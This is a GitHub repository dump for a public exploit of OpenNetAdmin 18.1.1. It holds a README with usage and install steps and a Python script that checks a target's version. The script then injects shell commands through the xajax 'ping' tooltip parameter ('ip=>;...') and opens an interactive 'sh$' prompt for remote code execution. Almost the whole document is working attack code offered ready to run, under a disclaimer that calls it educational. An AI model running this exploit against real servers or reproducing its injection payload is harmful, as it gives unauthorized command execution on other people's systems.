├── README.md ├── ona-proof.png └── ona-rce.py /README.md: -------------------------------------------------------------------------------- 1 | OpenNetAdmin 18.1.1 - Remote Code Execution 2 | ==== 3 | 4 | OpenNetAdmin 18.1.1 - Remote Code Execution 5 |
6 | https://amriunix.com/ 7 | 8 | ## Usage: 9 | ```shell 10 | $ python3 ona-rce.py [check | exploit] 11 | ``` 12 | * `check` -- Verify if the target is vulnerable 13 | * `exploit` -- Exploiting the target 14 | * `URL` -- The remote target 15 | 16 | ## Installation 17 | 18 | pip3 install --user requests 19 | git clone https://github.com/amriunix/ona-rce.git 20 | 21 | ## PoC 22 | 23 | ![Proof Of Concept for the OpenNetAdmin 18.1.1 - Remote Code Execution](ona-proof.png) 24 | 25 | ### Disclaimer: 26 | 27 | All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law. 28 | -------------------------------------------------------------------------------- /ona-proof.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amriunix/ona-rce/c4c809e8c757f27aad97f3b045c4fbc0f0efdbf8/ona-proof.png -------------------------------------------------------------------------------- /ona-rce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | ''' 4 | # Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution 5 | # Date: 2020-01-18 6 | # Exploit Author: @amriunix (https://amriunix.com) 7 | # Vendor Homepage: http://opennetadmin.com/ 8 | # Software Link: https://github.com/opennetadmin/ona 9 | # Version: v18.1.1 10 | # Tested on: Linux 11 | ''' 12 | 13 | import requests 14 | import sys 15 | from urllib3.exceptions import InsecureRequestWarning 16 | 17 | # Suppress only the single warning from urllib3 needed. 18 | requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) 19 | def helper(filename): 20 | print("\n[-] Usage: python3 " + filename + " [check | exploit] ") 21 | print("\n[*] Options:") 22 | print("\t[+] check : Verify if the target is vulnerable") 23 | print("\t[+] exploit : Exploiting the target\n") 24 | exit(1) 25 | def check(target): 26 | try: 27 | req = requests.get(url = target, verify = False) 28 | except: 29 | print("[-] Warning: Error while connecting o the remote target") 30 | exit(1) 31 | return('v18.1.1' in req.text) 32 | 33 | def exploit(target, cmd): 34 | payload = { 35 | 'xajax':'window_submit', 36 | 'xajaxr':'1574117726710', 37 | 'xajaxargs[]':['tooltips','ip=>;echo \"BEGIN\";{} 2>&1;echo \"END\"'.format(cmd),'ping'] 38 | } 39 | try: 40 | req = requests.post(url = target, data = payload, verify = False) 41 | except: 42 | print("[-] Warning: Error while connecting o the remote target") 43 | exit(1) 44 | data = req.text 45 | result = data[data.find('BEGIN')+6:data.find('END')-1] 46 | return(result) 47 | 48 | if __name__ == '__main__': 49 | print('[*] OpenNetAdmin 18.1.1 - Remote Code Execution') 50 | filename = sys.argv[0] 51 | if len(sys.argv) != 3: 52 | helper(filename) 53 | else: 54 | print("[+] Connecting !") 55 | opt = sys.argv[1].lower() 56 | target = sys.argv[2] + '/' 57 | if opt == 'check': 58 | if (check(target)): 59 | print("[+] The remote host is vulnerable!") 60 | else: 61 | print("[-] The remote host is NOT vulnerable!") 62 | elif opt == 'exploit': 63 | if (check(target)): 64 | print("[+] Connected Successfully!") 65 | else: 66 | print("[-] Warning: Error while connecting o the remote target") 67 | cmd = '' 68 | while(True): 69 | cmd = input('sh$ ').lower() 70 | if (cmd == 'exit'): 71 | exit(0) 72 | print(exploit(target, cmd)) 73 | else: 74 | print("[-] Warning: Command not found !") --------------------------------------------------------------------------------